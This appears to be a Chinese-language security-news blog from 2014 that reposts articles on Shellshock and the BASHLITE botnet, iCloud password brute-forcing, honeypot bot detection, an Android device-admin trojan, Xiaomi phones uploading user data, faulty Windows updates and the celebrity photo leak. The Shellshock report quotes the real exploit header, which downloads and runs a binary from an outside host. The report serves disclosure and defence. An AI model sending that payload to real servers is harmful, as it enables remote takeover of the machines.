2014年9月28日 星期日

Shellshock/bash 漏洞攻擊現身,可發動 DDoS 攻擊

Shellshock/bash 漏洞攻擊現身,可發動 DDoS 攻擊

在Shellshock/bash 漏洞(包含在CVE-2014-7169)新聞爆發後短短幾個小時就出現了真實的漏洞攻擊事件。這一個漏洞可以讓人執行任意程式碼,從而影響系統安全。攻擊者可能做出的包括變更網站內容和網站程式碼、污損網站外貌,甚至是從資料庫竊取使用者資料以及其他更多事情。

趨勢科技發現了真實漏洞攻擊碼所帶來惡意軟體的樣本。偵測為ELF_BASHLITE.A(也被稱為ELF_FLOODER.W),此惡意軟體可以發動分散式阻斷服務(DDoS)攻擊。它所會執行的指令包括有:

●PING
●GETLOCALIP
●SCANNER
●HOLD 暫停或是延後攻擊一給定時間
●JUNK 垃圾洪水攻擊
●UDP 用UDP封包做分散式阻斷服務攻擊
●TCP 用TCP封包做分散式阻斷服務攻擊
●KILLATTK – 終止攻擊執行緒
●LOLNOGTFO – 終止僵屍機器人

它也可以做到暴力法登入,讓攻擊者可以取得登入使用者和密碼的列表。根據我們的分析,ELF_BASHLITE.A也會連到 C&C伺服器 – 89[點]238[點]150[點]154[冒號]5。

圖1、威脅感染示意圖

下面是用來帶入惡意軟體進到系統的程式碼:

Cookie:().{.:;.};.wget.-O./tmp/besh.http://162[dot]253[dot]66[dot]76/nginx;.chmod.777./tmp/besh;./tmp/besh;

此漏洞的嚴重性相當巨大,因為主要受影響的是網頁伺服器。它(此漏洞)也對物聯網(IoE ,Internet of Everything)設備帶來風險,因為用的是Linux(內含Bash)。據說它也影響到了比特幣(Bitcoin)/比特幣採礦,因此攻擊者很有可能會透過此途徑來建立起「Botnet傀儡殭屍網路」機器人大軍。

透過網路來對Shellshock漏洞進行攻擊的企圖可以透過下列Deep Discovery規則偵測到:

●1618 – Shellshock HTTP REQUEST
其他趨勢科技產品(趨勢科技的OSCE、IWSVA和PC-cillin)都可以將此網路行為偵測為CVE-2014-6271-SHELLSHOCK_REQUEST。

此外,趨勢科技的Deep Security可以透過以下DPI規則來保護使用者免於此Bash漏洞威脅:

●1006256 – GNU Bash Remote Code Execution Vulnerability
其他想要檢查自己是否受到影響的使用者可以查看Shellshock免費防護。想知道更多可能的Shellshock漏洞攻擊情景,請參考文章 – Shellshock – 它有多嚴重?

此次攻擊的相關雜湊值是0229e6fa359bce01954651df2cdbddcdf3e24776。

原文出處:Bash Vulnerability (Shellshock) Exploit Emerges in the Wild, Leads to BASHLITE Malware
轉載自《網路安全趨勢

2014年9月26日 星期五

在明星裸照事件六個月前,蘋果就已知悉 iCloud 漏洞

在明星裸照事件六個月前,蘋果就已知悉 iCloud 漏洞

28bb754c990f5858304f8e9acb0cdab3

從 iCloud 洩漏的明星裸照事件還在不斷延燒,即使蘋果不斷保證自己的資安政策,但從最近流出的一封資安研究員與蘋果公司的信件往來,卻透露出蘋果早就已經知道 iCloud 漏洞,卻沒有及時修復。

根據外媒 Daily Dot 報導,倫敦工程師伊伯拉希‧巴利克(Ibrahhim Balic)早在六個月前,就已經寄信給蘋果,表示 iCloud 帳號有可以透過暴力破解密碼的漏洞,且這個漏洞在明星裸照洩漏事件後才修復,因此也被認為是這次 iCloud 帳號遭駭的主因。

就在這封 3 月 26 日的電子郵件中,巴利克表示駭客可以透過無數次輸入密碼的「暴力破解」方式,破解 iCloud 密碼,巴利克自己就在同一個帳號中嘗試輸入 20,000 次的錯誤密碼,但卻沒有任何事情發生,通常來說,輸入一定次數的錯誤密碼後,就應該要有暫時阻止輸入密碼的機制,但蘋果當時並沒有被似的機制。(附註:英文並非巴利克的母語。)


即使到了 2014 年 5 月 26 日,蘋果仍然與巴利克有信件往來,但官方人員仍不斷質疑巴利克所發現的問題。



但蘋果並未承認這個漏洞與這次的明星裸照洩露事件有關,巴利克表示,蘋果的開發人員只是要求他提供更多的資料,卻沒有真正重視這個問題,如果他們能及早修復這個問題,或許這次的裸照事件就不會發生。

不過蘋果至今不認為這次 iCloud 裸照洩露事件,與 iCloud 密碼暴力破解有任何關聯性。

轉載自《科技新報

2014年9月15日 星期一

資訊安全的 Hak5 頻道

資訊安全的 Hak5 頻道

Hak5 是一群自許為IT忍者、專業資安人員與核心硬派玩家所共同經營的頻道(這當然是英文頻道,影片放置於 youtube ),內容範圍從網路安全、開放式原始碼甚至數位鑑識等議題,並以製播影集節目的方式來推出(目前最新到第17季了)。

經常討論一些當紅 hacking、modding 的議題,例如:第11季第2集就討論 Backtrack 5 with root encryption (順便聊到知名遊戲Minecraft的實體贈品禮物<--超想要)、第10季第17集邀請知名駭客 Kevin Mitnick 來節目聊聊、第8季第25集談論到 Android Botnets, Hacking IPv6 等,對於研究資訊安全的人來說是個增廣見聞的好節目。

頻道網址:http://hak5.org/

轉載自《網路攻防戰》

2014年9月9日 星期二

防止伺服器變殭屍電腦有新招 趨勢用HoneyPot陷阱誘捕Bot病毒

防止伺服器變殭屍電腦有新招 趨勢用HoneyPot陷阱誘捕Bot病毒

趨勢科技提出一套新的事前偵測Bot病毒的方法,採用過去防止駭客入侵的蜜罐(HoneyPot)機制,在受保護的伺服器主機旁設下誘捕陷阱來找出Bot病毒入侵的威脅



今年6月香港公投網站曾遭到多起大規模DDOS攻擊,高達每秒300Gb的攻擊流量,發現不少是來自臺灣受操控的殭屍電腦,反應出目前臺灣仍潛藏大量的殭屍病毒尚未發現。不過近日,趨勢科技則是提出一套新的事前偵測方法,採用過去防止駭客入侵的蜜罐(HoneyPot)機制,在受保護的伺服器主機旁設下誘捕陷阱來找出Bot病毒入侵的威脅。

殭屍網路(Botnet)一直是許多網路駭客進行網路攻擊的常用手法,經由在受害電腦內植入可遠端操控電腦的惡意程式,進而操控這些殭屍電腦進行各種違法行為,而且不只是個人電腦受駭,許多企業電腦也都可能遭到入侵成為殭屍軍團的一份子。

然而,一般針對Botnet的入侵偵測,大多為一種事後偵測,像是以IDS或IPS入侵偵測系統來說,必須先取得遭Bot惡意程式入侵的攻擊樣本,才能找出內網(LAN)尚未遭惡意程式入侵的受害電腦,但其實這時候入侵行為早已發生。

因此,趨勢科技網路威脅防禦技術部技術經理高迦南,近日則是提出一個可作為事前偵測Bot病毒入侵的新方法。他說,一般Bot殭屍病毒或惡意程式入侵前,會先對固定幾個埠(Port)掃描是否存在可入侵的弱點,因此若能先一步在Bot進行通訊埠掃描(Port Scan)時,就採取反掃描偵測,就能在入侵前找到可能是殭屍網路的威脅。

以反掃描偵測工具,對Bot設下陷阱誘捕

為了能成功找到可能是Bot的威脅,高迦南也採用過去用來防止駭客入侵的蜜罐(HoneyPot)機制,作為事前偵測的工具。HoneyPot是一個誘捕系統,主要是用來設下陷阱誘使壞人或惡意程式展露其行為或意圖,因此,它可以將自己偽裝成是一臺伺服器,也能當成是一個虛擬機器或是Web客戶端。

高迦南採取作法是,在需要被保護的電腦或伺服器主機旁架設一臺具誘捕功能的蜜罐設備(HoneyPot),然後將其IP設在受保護對象附近,啟動後完全不開啟任何服務或只提供少量服務,就如同影武者一般,將身形完全隱身起來,讓外界無法察覺它的存在。

而當這臺誘捕設備啟動後收到來自網路不明主機的通訊埠掃描時,就代表對方很有可能是一臺掃瞄器,正在做入侵前的掃描行為,尋找是否有可入侵的弱點。

高迦南表示,此種事前偵測方式,好處是,即使駭客自行調低每秒發送掃描封包的次數,該設備也能偵測得到,而且不論從外網(WAN)或內網(LAN)的掃描都可偵測而沒有誤判問題。

甚至他也表示,此種偵測方式也能適用於自帶設備(BYOD)和IoT物聯網裝置的入侵偵測威脅。

除此之外,這個 Bot入侵預警機制也能與SDN交換器結合使用。透過SDN交換器本身所具備的即時、動態與軟體可控特性,當HoneyPot偵測有Bot正對其它電腦進行掃描時,即會通知SDN交換器的控制器,迅速將受感染的Bot疆屍電腦隔離起來,讓感染範圍能控制在最低。而經過高迦南測試後,也可得到98.5%的阻擋率。

5年掃到18萬個IP入侵,共記錄120萬筆log資料

高迦南事後也分析了2009年至2014年7月間,由HoneyPot反掃描偵測裝置記錄下的入侵威脅,總共偵測近18萬個IP位址,共記錄120萬筆的log資料。

而從這些資料也發現,有三分之一的TCP通訊埠和近1500個UDP通訊埠都曾遭到入侵掃描。當中被掃描次數最多TCP通訊埠,前三名分別是1433 埠( MS SQL Server )、445埠 ( SMB ),以及9415埠(PPLive開放代理)。而在UDP通訊埠方面,被掃描次數最多前三名則分別是29285埠、22722 埠及137 埠。高迦南也提醒,如果有使用PPLive網路電視的用戶,要小心恐遭利用成為疆屍電腦入侵的對象。

甚至,高迦南也表示,這種事前偵測方式,未來也可運用在0day(零時差攻擊)漏洞的預警機制,在廠商尚未公布弱點前,就能拿來事先判斷是否有出現類似的入侵威脅發生。

轉載自《iThome

AdDevice木馬分析報告

AdDevice木馬分析報告

我們知道,如果軟件需要激活設備管理器,需要用戶的確認。但近期360互聯網安全中心截獲了一批木馬,該木馬軟件通過精巧的設計,偽裝成Android的升級通知,提示將系統升級到最新的Android 4.4系統,強迫用戶只能點擊「確定」按鈕升級系統。但用戶事實上點擊的卻是激活設備管理器。而此時,木馬就獲得了防止卸載的能力,達到強行駐留用戶手機上的目的,剝奪了用戶對手機的控制權。360互聯網安全中心提醒網民,請通過360手機助手等正規應用市場下載應用。目前360已全面查殺該木馬。

1

一、木馬實現原理圖:

兩張圖

使用一個假的界面放在激活設備管理器對話框的上面。

二、具體分析如下:

1)、流氓行為:

檢測設備管理器是否被激活。激活了則啟動程序正常功能,未激活則彈出激活設備管理器界面,同時啟動惡意服務DService。

image3

惡意服務調用popView,以提示用戶升級系統為理由,繪製出一個虛假的的界面,覆蓋了真實在激活界面。

A)、該應用正常的激活設備管理器的界面應該如下,對用戶來講有選擇不激活的權力:

激活

B)、然而當調用完popView後,會在「激活設備管理器」對話框的上面繪製出一個假的提示頁面,相關代碼如下:

image5

該虛假界面如下:

通知

當該界面覆蓋在設備管理器上面時,用戶只能點擊確定(取消按鈕、返回鍵、主頁鍵均無效)。實際是點擊了確定下面的按鈕,即激活設備管理器中的激活按鈕,從而該應用順利的激活設備管理器。

C)、最後該應用會調用delView將該虛假頁面刪掉,達到點擊確定,退出頁面的效果。

2)、惡意行為:

A)、獲取用戶短息,IMEI,IMSI等用戶敏感信息,上傳到黑客服務器

image8

B)、從遠程獲取攔截規則,自動回覆遠程指定的短信,並且把收件箱的短信轉發到黑客手機號碼上。

image9

該應用獲取遠程的過濾規則

image10

當手機接收短信時,木馬會過濾遠程指定電話號碼的短信

image11

image12

image13

自動回覆遠程指定的短信並且把收件箱的短信轉發到黑客手機號碼上。

解決方案

1、通過手機360衛士直接查殺。

2、使用數據線將手機與電腦連接起來,然後在電腦上下載並安裝360系統急救箱,使用其中的「手機木馬專殺」功能查殺病毒。

同時,我們強烈建議用戶從正規渠道購買手機,安裝360手機衛士保護手機安全。如遇到病毒反覆查殺、手機中靜默安裝軟件等異常現象,請及時向我們反饋。

轉載自《360移動安全

紅米資安又亮紅燈 每半小時回傳個資

紅米資安又亮紅燈 每半小時回傳個資

中國製的紅米1S又傳資安疑慮。(取自官網)

中國產的小米機再爆隱私外洩疑雲?今年7、8月,小米機被發現未經同意自行上傳客戶資料至位於北京的伺服器,之後在輿論壓力下認錯並提供更新檔。但根據港媒8日報導,紅米1S在系統更新後,閒置狀態下仍會每半小時傳送加密資料到一個位在新加坡的租用伺服器。測試專家表示,從上傳的密集度和檔案大小來看,不排除有涉及洩漏隱私之嫌。

8月初,一名香港手機使用者和新加坡、台灣的資安公司測試發現,小米3和紅米1s會在開機連網後自動回傳用戶電話號碼和手機序號、自動開啟網路簡訊回傳收發方號碼到一個位在北京的伺服器。8月10日,小米公司發布OTA手機系統更新檔,聲明已修正網路簡訊自動啟動功能,已無任何未經用戶許可傳輸資料到小米伺服器的行為,並將正常上傳改以加密進行。

然而,香港《蘋果日報》9月8日報導指出,蘋果委託資訊安全公司Nexusguard Consulting、互聯網協會網絡保安及私隱小組召集人楊和生,對全新的香港版紅米1S手機進行13天的測試,發現紅米機仍有資安疑慮。

在未安裝更新前,紅米機在閒置狀態下,每天早上會將加密資料傳至IP位置為「北京藍訊通信技術有限責任公司」(ChinaCache)的伺服器,因傳送的檔案大小由893B至30KB,楊和生認為不排除包含通訊錄在內等文字資料。

安裝OTA系統更新檔後,上傳目標改為位於新加坡的Amazon伺服器,檔案大小縮減為143B至4KB,傳送頻率為半小時一次,屬不尋常的密集頻率。而Amazon伺服器因成本、技術門檻低,被認為是近年駭客的新寵。

Nexusguard Consulting之後將紅米原廠系統刪除,改安裝他方製作的作業系統,進行相同測試後發現,不再有自行上傳資料到北京或新加坡伺服器的行為,故推測是由原廠作業系統啟動上傳。


除了作業系統,「小米應用商店」也有隱私疑慮。

由於中國的資訊審查制度,小米手機的中國版本無法使用Google Play Store服務,而是使用自行開發的小米商店,程式外觀與前者非常相似。Nexusguard Consulting測試後發現,在小米應用商店下載的小米版WhatsApp,發訊時會同時將資料傳到九個在中國的伺服器,分屬於中國聯通、北京森華易騰通信技術有限公司、北京藍訊通信技術有限責任公司。

最早踢爆小米隱私疑慮的香港網友稱8月13日就發動一人一信要求香港個人資料私隱專員公署進行調查,但未獲官方積極回應。

轉載自《風傳媒

2014年9月7日 星期日

《震撼,Microsoft出包沒修好臭蟲又爆新災情》網友氣炸爆Windows Update比病毒還可怕,視窗更新一波未平一波又起!

《震撼,Microsoft出包沒修好臭蟲又爆新災情》網友氣炸爆Windows Update比病毒還可怕,視窗更新一波未平一波又起!

/webroot/data/media/1dd56db603dca039c63c3b460c1eb786_800.jpg
▲自從2014年8月初,Microsoft爆史上最大出包之後。2014年8月27日,微軟出新的更新出來替補,結果,又出事了。到了現在2014年9月份,新災情持續!

自從2014年8月初,Microsoft爆史上最大出包之後。2014年8月27日,微軟出新的更新出來替補,結果,又出事了。到了現在2014年9月份,新災情持續,等於是出包沒修好臭蟲又爆新災情!網友直呼不可思議,還有網友氣炸,爆Windows Update比病毒還可怕,視窗更新一波未平一波又起!

/webroot/data/media/da513fb2b58e90b3928774e3ab04c39a_800.jpg
▲在我們台灣國內遊戲專業的巴哈姆特論壇。網友junsukiyu說更新KB2993651之後,變成沒辦法上國外網站,連國內也跑很慢,結果一刪掉就好了,網友認為這比病毒還可怕(圖片來源:巴哈姆特)

微軟8月才出包,9月又有新災情!

時間也不過在上個月,Microsoft爆史上最嚴重出包。8月份出包,8月底才出了新的更新,想不到,又有新災情。自從PCDIY!做了特別報導Microsoft爆史上最嚴重出包,MS14-045安全更新事件用戶出現Stop 0x50的死亡藍白畫面之後,PCDIY!進行了特別報導,才讓大家重視了Windows Update裡面的更新出了4個錯誤,有4個更新有問題,包括了2982791、2970228、2975719與2975331更新有問題沒做好就釋放出來,導致一堆人自行被封鎖,出現死亡藍色畫面,因此叫修電腦,重灌系統,弄得全世界都為了Windows Update天下大亂。結果,Microsoft在美國時間2014年8月27日,又釋出了補洞的更新KB2993651,網友說是補洞的補洞,才有玩家說,補洞沒補好的話,會越補洞越大。結果,補洞的更新KB2993651,竟然又爆新災情,網友的預言竟然一語成真,等於是Microsoft出包沒修好臭蟲!

/webroot/data/media/40c3f0a244281baa56d4bdc1399fbd32_800.jpg
▲在我們台灣國內討論區最夯的mobil01論壇。網友zhucc說更新KB2993651之後,變成半夜死當兩次,都是畫面整個卡住、只能重新開機。(圖片來源:mobil01)

/webroot/data/media/32f77ebea72b0b0adaa1afe76915876e_800.jpg
▲網友說,Microsoft更新KB2993651,是補洞中的補洞(圖片來源:plurk)

2014年8月27日,Microsoft推出補洞的更新KB2993651

由於只要微軟視窗有更新,Microsoft出了新的Windows Update,PCDIY!觀察,就立刻會有敢死隊搶著去更新,不過,原廠沒事,別人沒事,並不代表每個人裝了都沒事,很巧的,這次又有人的電腦出事。

/webroot/data/media/274db71cc7ff920d631609ed59847d00_800.jpg
▲2014 年 8 月 27 日,Microsoft釋出補洞的更新KB2993651,用來替代之前出問題的更新KB2982791(這邊要特別注意,圖片的右上角,微軟自己爆料,現在已經證實Microsoft軟體產品中有一個安全性問題,可能會影響您的系統)

/webroot/data/media/bd0b0f9771f15201d2401e3b8e1ee095_800.jpg
▲Microsoft釋出補洞的更新KB2993651,網友說用了之後,Win7開機歡迎畫面變得卡卡的(圖片來源:巴哈姆特)

看看微軟官方文件KB2993651

接著,這就讓我們一起來看看,2014年8月27日,Microsoft推出補洞的更新KB2993651,微軟官方文件「MS14-045:說明核心模式驅動程式的安全性更新:2014 年 8 月 27 日」裡面究竟藏著什麼膏藥?

/webroot/data/media/4ddac3f3c8ca640c7014ff9ccaa4e560_800.jpg
▲微軟官方文件「MS14-045:說明核心模式驅動程式的安全性更新:2014 年 8 月 27 日」

/webroot/data/media/83f289bf6eadcb9c6840bf34531b4cde_800.jpg
▲KB2993651就是要來替換上次出包的KB2982791

/webroot/data/media/892fad874aa6c2f27d9cec1e6f65901d_800.jpg
▲KB2993651的已知問題

Microsoft找到的已知問題!

這次補洞的更新,Microsoft推出的補洞更新KB2993651,文件中很清楚的說到,KB2993651就是為了解決KB2982791的Stop 0x50死亡藍白畫面大問題,然而,前陣子也真相大白,已經知道,之前的KB2982791,即便裝了,不一定會出事,運氣好的話沒事,運氣不好的話,就要按照Microsoft公佈的和措施要12步驟來維修,或者是直接Windows系統重灌。而這次的新KB2993651,很抱歉,已知的問題雖然沒說會當機,但(已知的問題1)字型錯誤還在,簡單來說,會有一些字型錯誤,還有不能用捷徑來安裝字型,另外,(已知的問題2),是某些應用程式的視窗會不可見於,說的有點文言文,就是會看不到。而且,Microsoft有承認,下面有寫我們目前正在處理這個問題的解決方案。

/webroot/data/media/788e6bfe0e0470321c1ff0011ce7921d_800.jpg
▲KB2993651一樣是對應Windows Vista到Windows 8.1

/webroot/data/media/259043d15dcc33ad3c47471560bdf4c6_800.jpg
▲Microsoft也有提出KB2993651的但書

網友幫忙找到Microsoft的未知問題!

這次Microsoft推出的補洞更新KB2993651,已經有很多玩家、專業用戶與企業IT人員安裝使用過,也爆了一些新災情,由於不是Microsoft找到的已知問題,所以,這就是網友幫忙找到Microsoft的未知問題。由於,上次PCDIY!報導了「《震撼,Microsoft爆史上最嚴重出包》Windows Vista、7、8與8.1全中獎,安裝更新之後就得要修理或重灌!【已更新10】」之後,Taiwan Microsoft發出新聞稿,說:「台灣微軟目前沒有接獲通報有使用者遇到此狀況」,還說相信能導正諸多以訛傳訛的誤導,為了避免公說公有理婆說婆有理,演變成跟上次Microsoft爆史上最嚴重出包,竟然演變成Microsoft與網友各說各話,出現羅生門的狀況,還有人說這是鬼打牆,實在令人匪夷所思的情形。這邊,PCDIY!認為有圖有真相,PCDIY!在此特別幫大家做個整理,讓大家可以知道真實的狀況!

/webroot/data/media/42d4c820c5c6822a314c5fc0536eb2ee_800.jpg
▲上回,8月份Microsoft爆史上最嚴重出包,微軟官方文件已經自白說會出現Stop 0x50的死亡藍白畫面

/webroot/data/media/6791b171edf8e564eb224bfd4c2f84a6_800.jpg
▲不過,8月份Microsoft爆史上最嚴重出包,結果Taiwan Microsoft發新聞稿說台灣微軟目前沒有接獲通報有使用者遇到此狀況,竟然演變成Microsoft與網友各說各話,出現羅生門的狀況,還有人說這是鬼打牆,實在令人匪夷所思的情形

巴哈姆特論壇,網友反應更新KB2993651新災情

在我們台灣國內遊戲專業的巴哈姆特論壇,網友junsukiyu說更新KB2993651之後,變成沒辦法上國外網站,連國內也跑很慢,結果一刪掉就好了,網友認為這比病毒還可怕。網友foreverpizza說更新KB2993651之後,出現安裝失敗藍屏,好在電腦自動復原。網友paul123321說更新KB2993651之後,出現win7歡迎畫面有點怪,卡圈圈30秒。網友goodgob1209,說由於電腦都會自動更新+安裝,不過最近電腦變的超級慢,不知道是不是跟KB2993651有關。

/webroot/data/media/8bc2f9bda7d43a614bdb90dfa1e9fdb7_800.jpg
▲網友junsukiyu說更新KB2993651之後,變成沒辦法上國外網站,連國內也跑很慢,結果一刪掉就好了,網友認為這比病毒還可怕(圖片來源:巴哈姆特)

/webroot/data/media/505f29d084b7522e06849dba57563d29_800.jpg
▲網友foreverpizza說更新KB2993651之後,出現安裝失敗藍屏,好在電腦自動復原(圖片來源:巴哈姆特)

/webroot/data/media/846160a5bd4d84af8f710f0c6447525c_800.jpg
▲網友paul123321說更新KB2993651之後,出現win7歡迎畫面有點怪,卡圈圈30秒(圖片來源:巴哈姆特)

/webroot/data/media/501ffd66d815648561cba9a426fa9fff_800.jpg
▲網友goodgob1209,說由於電腦都會自動更新+安裝,不過最近電腦變的超級慢,不知道是不是跟KB2993651有關(圖片來源:巴哈姆特)

mobil01論壇,網友反應更新KB2993651新災情

在我們台灣國內討論區最夯的mobil01論壇,網友zhucc說更新KB2993651之後,變成半夜死當兩次,都是畫面整個卡住、只能重新開機。網友guies說更新KB2993651之後,變成開機藍屏,0x0000007E,進不了桌面,進安全模式移除之後正常,說而且是全新安裝的系統,沒有雜七雜八的軟體。

/webroot/data/media/0e638393af324f82555da1b6bb7ec817_800.jpg
▲網友guies說更新KB2993651之後,變成開機藍屏,0x0000007E,進不了桌面,進安全模式移除之後正常,說而且是全新安裝的系統,沒有雜七雜八的軟體。(圖片來源:mobil01)

PTT BBS,網友反應更新KB2993651新災情

在我們台灣國內BBS紅不讓的PTT,網友powerg5說更新KB2993651之後,變成在安裝完成後竟然連續出現好多次藍色當機畫面,看得快把我嚇死。網友hirokofan說更新KB2993651之後,變成我昨天更新後也是先炸掉(藍底哭臉),重開後「好像」又沒事了。目前,也還有更多網友加入KB2993651更新的挑戰,希望大家都沒事。

/webroot/data/media/c9bd888bed5389dcf7c0b2d1d4a5085a_800.jpg
▲網友powerg5說更新KB2993651之後,變成在安裝完成後竟然連續出現好多次藍色當機畫面,看得快把我嚇死(圖片來源:PTT)

/webroot/data/media/620a45d76f8ccbefd6c9c0afb0e6b00d_800.jpg
▲網友hirokofan說更新KB2993651之後,變成我昨天更新後也是先炸掉(藍底哭臉),重開後「好像」又沒事了。(圖片來源:PTT)

中標=這次的新災情,一樣Windows Vista到Windows 8.1無一倖免
和上次Microsoft在2014年8月12日提出了2982791技術支援報告(http://support.microsoft.com/kb/2982791),裡面說明了核心模式驅動程式的安全性更新MS14-045,才公開了這次天大的錯誤。這Microsoft在2014年8月27日提出了2993651技術支援報告(http://support.microsoft.com/kb/2993651/zh-tw),也讓我們明白,一樣的,Windows Vista到Windows 8.1無一倖免。當然,一樣的,不是每一台電腦都出問題,不過,這也是令人匪夷所思的地方。

/webroot/data/media/3f84dbaaa2f95d1b622ced86ad75085d_800.jpg
▲網友powerg5收到關於Microsoft更新KB2993651電子報

/webroot/data/media/b3182ab88f839886811e878713a3959f_800.jpg
▲Microsoft更新KB2993651電子報進一步說明

/webroot/data/media/21071d9502b9535b6738ba2aae6e9b4e_800.jpg
▲由於Windows Update近期一直出事,以往,Microsoft推出的Windows Update就立刻會有人馬上更新,現在,大家會比較謹慎,先把自動更新給關閉,改成手動更新!

網友氣炸了,爆Windows Update比病毒還可怕

由於,對絕大多數的玩家、專業用戶與企業IT人員來說,Microsoft就是神,Windows是最好的作業系統,所以,Microsoft推出的Windows Update就要立刻馬上更新,這樣比較安全。不過,現在證實了,Microsoft也會出包,Windows還是會有死亡藍色畫面、藍底白字畫面。正因為如此,網友氣炸了,才說Windows Update比病毒還可怕,還有網友說,到底要重灌Windows幾次,也有網友說對Microsoft太失望了。看來,Microsoft以後出Windows Update,新的視窗更新可不要衝第一,以免當了冤大頭,還要重灌系統,真的是虧大了!

轉載自《PCDIY!

基隆文化局網站遭駭 使用不受影響

基隆文化局網站遭駭 使用不受影響


基隆市文化局網站昨天遭駭客入侵,經查發現後端主機遭植入不明程式碼,所幸並不具攻擊性,一般民眾若連上文化局網站也不會受影響。文化局表示,目前正在製作新的網站系統,預計年底上架,屆時即可降低被駭客入侵的機率。

市府研考處昨天上午收到行政院國家資通安全會報技術服務中心通知, 警告市府文化局網站恐遭駭客入侵,建議市府立即移除網頁,清查網頁主機的作業系統及應用軟體是否已安裝最新的修補程式,並檢視主機是否被安裝後門程式。

文化局行政科長李明信表示,接到通知後,隨即連上文化局網站,並未發現頁面有任何異狀,操作也都正常,進一步打去資安中心詢問,回覆後端主機遭植入不明程式碼,但對前端網站呈現並不受影響,因此民眾可正常連上網頁。文化局已請網站維護廠商移除不明程式碼。

李明信說,文化局網站為10多年前的產物,當時的技術及安全性較弱,因此易被駭客侵入及攻擊。今年已發生過數次疑似遭駭客入侵的事件,甚至曾被植入過小丑的圖片。

轉載自《UDN聯合新聞網

2014年9月1日 星期一

iCloud 帳號被駭 多名女明星私密照流出

iCloud 帳號被駭 多名女明星私密照流出

20140901120336

2014 年 8 月 31 日多名好萊塢明星的私密照片在網路上曝光,知情人士透露這些照片是駭客攻擊了蘋果 iCloud 平台後獲得的,甚至有些在很久之前就被用戶刪除的照片也被盜取,多位明星已經證實了照片的真實性。


奧斯卡影后 Jennifer Lawrence 的多張裸照在網路上瘋傳,據悉這些照片來自 4Chan 論壇,發布者稱,這些照片是駭客攻擊了多個蘋果 iCloud 帳號獲得的,除了 Jennifer Lawrence 外,還有 Kate Upton、 Kate Bosworth、Victoria Justice、Avril Lavigne、Rihanna、Scarlet Johansson 等一眾好萊塢明星。

Jennifer Lawrence 的發言人確認了照片的真實性,這是公然侵犯個人隱私,Jennifer Lawrence 將就此事件提起訴訟。美國女星 Mary Winstead 透露此次流出的照片有些已經在​​好幾年前就刪除了,居然還能被盜。



此次女明星的私密照片流出,是因為駭客利用蘋果 iCloud 儲存平台的技術漏洞,進入明星的個人帳戶盜取私密照片,再將這些裸照發布至論壇上換取比特幣。駭客揚言還有更多明星的私密照片將公開。

題圖來自:Jennifer Lawrence and Other Celebs Hacked as Nude Images Circulate on the Web
轉載自《科技新報